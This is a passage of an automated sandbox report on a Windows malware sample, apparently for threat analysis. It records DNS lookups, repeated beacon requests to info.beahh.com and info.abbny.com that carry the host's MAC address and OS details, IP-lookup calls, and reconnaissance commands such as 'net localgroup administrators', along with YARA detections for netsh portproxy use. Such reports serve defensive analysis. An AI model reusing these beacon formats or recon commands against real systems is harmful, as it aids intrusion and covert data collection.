                                                                  Apr 5, 2021 11:24:55.869951963 CEST192.168.2.38.8.8.80x33aStandard query (0)info.ackng.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:58.338210106 CEST192.168.2.38.8.8.80x7bb5Standard query (0)info.beahh.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:58.716615915 CEST192.168.2.38.8.8.80x45ceStandard query (0)info.abbny.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:59.292834997 CEST192.168.2.38.8.8.80x1e7Standard query (0)info.ackng.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:00.380858898 CEST192.168.2.38.8.8.80xeb28Standard query (0)info.beahh.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:01.243465900 CEST192.168.2.38.8.8.80xc779Standard query (0)info.abbny.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:01.757683039 CEST192.168.2.38.8.8.80x734bStandard query (0)info.ackng.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:03.063101053 CEST192.168.2.38.8.8.80x4c51Standard query (0)info.beahh.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:04.465533972 CEST192.168.2.38.8.8.80x209aStandard query (0)info.abbny.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Apr 5, 2021 11:24:49.428086996 CEST8.8.8.8192.168.2.30xc6cdNo error (0)info.ackng.com127.0.0.1A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:50.480840921 CEST8.8.8.8192.168.2.30xcd26No error (0)ip.42.pl42.plCNAME (Canonical name)IN (0x0001)
                                                                  Apr 5, 2021 11:24:50.480840921 CEST8.8.8.8192.168.2.30xcd26No error (0)42.pl79.98.145.42A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:50.660466909 CEST8.8.8.8192.168.2.30xc903No error (0)info.beahh.combeahh.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 5, 2021 11:24:50.660466909 CEST8.8.8.8192.168.2.30xc903No error (0)beahh.com72.52.178.23A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:50.722232103 CEST8.8.8.8192.168.2.30xbc17No error (0)jsonip.com45.79.77.20A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:51.069844961 CEST8.8.8.8192.168.2.30xc1e5No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                  Apr 5, 2021 11:24:51.119930029 CEST8.8.8.8192.168.2.30x6932No error (0)info.abbny.com173.231.189.15A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:51.183566093 CEST8.8.8.8192.168.2.30xa295No error (0)jsonip.com45.79.77.20A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:51.738825083 CEST8.8.8.8192.168.2.30xc2f3No error (0)info.ackng.com127.0.0.1A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:52.966620922 CEST8.8.8.8192.168.2.30x81dfNo error (0)info.beahh.combeahh.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 5, 2021 11:24:52.966620922 CEST8.8.8.8192.168.2.30x81dfNo error (0)beahh.com72.52.178.23A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:53.350553989 CEST8.8.8.8192.168.2.30x30c0No error (0)info.abbny.com173.231.189.15A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:53.842984915 CEST8.8.8.8192.168.2.30x25a6No error (0)info.ackng.com127.0.0.1A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:54.935036898 CEST8.8.8.8192.168.2.30xe70eNo error (0)info.beahh.combeahh.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 5, 2021 11:24:54.935036898 CEST8.8.8.8192.168.2.30xe70eNo error (0)beahh.com72.52.178.23A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:55.418486118 CEST8.8.8.8192.168.2.30x179fNo error (0)info.abbny.com173.231.189.15A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:55.921319008 CEST8.8.8.8192.168.2.30x33aNo error (0)info.ackng.com127.0.0.1A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:58.392496109 CEST8.8.8.8192.168.2.30x7bb5No error (0)info.beahh.combeahh.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 5, 2021 11:24:58.392496109 CEST8.8.8.8192.168.2.30x7bb5No error (0)beahh.com72.52.178.23A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:58.770958900 CEST8.8.8.8192.168.2.30x45ceNo error (0)info.abbny.com173.231.189.15A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:59.349452972 CEST8.8.8.8192.168.2.30x1e7No error (0)info.ackng.com127.0.0.1A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:00.541034937 CEST8.8.8.8192.168.2.30xeb28No error (0)info.beahh.combeahh.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 5, 2021 11:25:00.541034937 CEST8.8.8.8192.168.2.30xeb28No error (0)beahh.com72.52.178.23A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:01.300173998 CEST8.8.8.8192.168.2.30xc779No error (0)info.abbny.com173.231.189.15A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:01.813628912 CEST8.8.8.8192.168.2.30x734bNo error (0)info.ackng.com127.0.0.1A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:03.117399931 CEST8.8.8.8192.168.2.30x4c51No error (0)info.beahh.combeahh.comCNAME (Canonical name)IN (0x0001)
                                                                  Apr 5, 2021 11:25:03.117399931 CEST8.8.8.8192.168.2.30x4c51No error (0)beahh.com72.52.178.23A (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:25:04.514276981 CEST8.8.8.8192.168.2.30x209aNo error (0)info.abbny.com173.231.189.15A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • ip.42.pl
                                                                  • info.beahh.com
                                                                  • jsonip.com
                                                                  • info.abbny.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.34974279.98.145.4280C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:50.548393011 CEST3110OUTGET /raw HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: ip.42.pl
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7
                                                                  Apr 5, 2021 11:24:50.614840031 CEST3111INHTTP/1.1 200 OK
                                                                  Date: Mon, 05 Apr 2021 09:24:50 GMT
                                                                  Server: Apache/2.4.29 (FreeBSD) OpenSSL/1.0.2k-freebsd PHP/5.6.32
                                                                  X-Powered-By: PHP/5.6.32
                                                                  Content-Length: 11
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 38 34 2e 31 37 2e 35 32 2e 37 39
                                                                  Data Ascii: 84.17.52.79


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.34974372.52.178.2380C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:50.817348957 CEST3112OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.beahh.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  10192.168.2.35135072.52.178.2380C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:25:00.785959959 CEST6778OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.beahh.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  11192.168.2.351384173.231.189.1580C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:25:01.451046944 CEST6779OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.abbny.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7
                                                                  Apr 5, 2021 11:25:01.581716061 CEST6780INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:25:01 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=b638e90736388123bcf7dccf21bb52a5|84.17.52.79|1617614701|1617614701|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  12192.168.2.35177272.52.178.2380C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:25:03.288067102 CEST7600OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.beahh.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  13192.168.2.351981173.231.189.1580C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:25:04.690469027 CEST7609OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.abbny.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7
                                                                  Apr 5, 2021 11:25:04.868447065 CEST7611INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:25:04 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=898608164d1d63004d24452166cd9834|84.17.52.79|1617614704|1617614704|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.34974445.79.77.2080C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:50.930787086 CEST3112OUTGET / HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: jsonip.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7
                                                                  Apr 5, 2021 11:24:51.124084949 CEST3114INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx/1.16.1
                                                                  Date: Mon, 05 Apr 2021 09:24:51 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 169
                                                                  Connection: close
                                                                  Location: https://jsonip.com/
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.349746173.231.189.1580C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:51.279850006 CEST3574OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.abbny.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7
                                                                  Apr 5, 2021 11:24:51.420372963 CEST3576INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:24:51 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=3a3d5f276c84172fefb240b1dc451ddf|84.17.52.79|1617614691|1617614691|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.34988172.52.178.2380C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:53.128603935 CEST3605OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.beahh.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.350005173.231.189.1580C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:53.487926006 CEST4112OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.abbny.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7
                                                                  Apr 5, 2021 11:24:53.637577057 CEST4665INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:24:53 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=6f0fc984103f8290cdb6ed3d48e277a9|84.17.52.79|1617614693|1617614693|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.35036672.52.178.2380C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:55.111429930 CEST4682OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.beahh.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.350490173.231.189.1580C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:55.574418068 CEST4683OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.abbny.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7
                                                                  Apr 5, 2021 11:24:55.709731102 CEST4687INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:24:55 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=a83eefa89733bb5c9840a611619eaf1a|84.17.52.79|1617614695|1617614695|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  8192.168.2.35091972.52.178.2380C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:58.550501108 CEST6775OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.beahh.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  9192.168.2.350993173.231.189.1580C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 5, 2021 11:24:58.959186077 CEST6776OUTGET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1
                                                                  Accept-Encoding: identity
                                                                  Host: info.abbny.com
                                                                  Connection: close
                                                                  User-Agent: Python-urllib/2.7
                                                                  Apr 5, 2021 11:24:59.157944918 CEST6777INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Mon, 05 Apr 2021 09:24:59 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: btst=; path=/; domain=.info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=; path=/; domain=info.abbny.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: btst=97456ced88f34bb2cd4f798d649fe5f0|84.17.52.79|1617614699|1617614699|0|1|0; path=/; domain=.abbny.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                  Set-Cookie: snkz=84.17.52.79; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  HTTPS Packets

                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                  Apr 5, 2021 11:24:52.150207043 CEST45.79.77.20443192.168.2.349747CN=jsonip.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Feb 23 03:05:44 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon May 24 04:05:44 CEST 2021 Wed Sep 29 21:21:40 CEST 2021
                                                                  CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: UlJpFEz1Cj.exe PID: 6528 Parent PID: 5692

                                                                  General

                                                                  Start time:11:22:56
                                                                  Start date:05/04/2021
                                                                  Path:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
                                                                  Imagebase:0x1180000
                                                                  File size:6967362 bytes
                                                                  MD5 hash:DDE978F310F46D0556EA774DA695B698
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: conhost.exe PID: 6588 Parent PID: 6528

                                                                  General

                                                                  Start time:11:22:57
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: UlJpFEz1Cj.exe PID: 6640 Parent PID: 6528

                                                                  General

                                                                  Start time:11:22:59
                                                                  Start date:05/04/2021
                                                                  Path:C:\Users\user\Desktop\UlJpFEz1Cj.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\UlJpFEz1Cj.exe'
                                                                  Imagebase:0x1180000
                                                                  File size:6967362 bytes
                                                                  MD5 hash:DDE978F310F46D0556EA774DA695B698
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000003.00000003.203224359.0000000004464000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000003.00000003.203074202.000000000435C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  Reputation:low
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: cmd.exe PID: 6684 Parent PID: 6640

                                                                  General

                                                                  Start time:11:23:03
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c wmic ntdomain get domainname
                                                                  Imagebase:0xbd0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: WMIC.exe PID: 6696 Parent PID: 6684

                                                                  General

                                                                  Start time:11:23:03
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:wmic ntdomain get domainname
                                                                  Imagebase:0x10c0000
                                                                  File size:391680 bytes
                                                                  MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: cmd.exe PID: 6752 Parent PID: 6640

                                                                  General

                                                                  Start time:11:23:04
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c net localgroup administrators
                                                                  Imagebase:0xbd0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: net.exe PID: 6764 Parent PID: 6752

                                                                  General

                                                                  Start time:11:23:05
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:net localgroup administrators
                                                                  Imagebase:0x1b0000
                                                                  File size:46592 bytes
                                                                  MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: net1.exe PID: 6788 Parent PID: 6764

                                                                  General

                                                                  Start time:11:23:05
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\net1 localgroup administrators
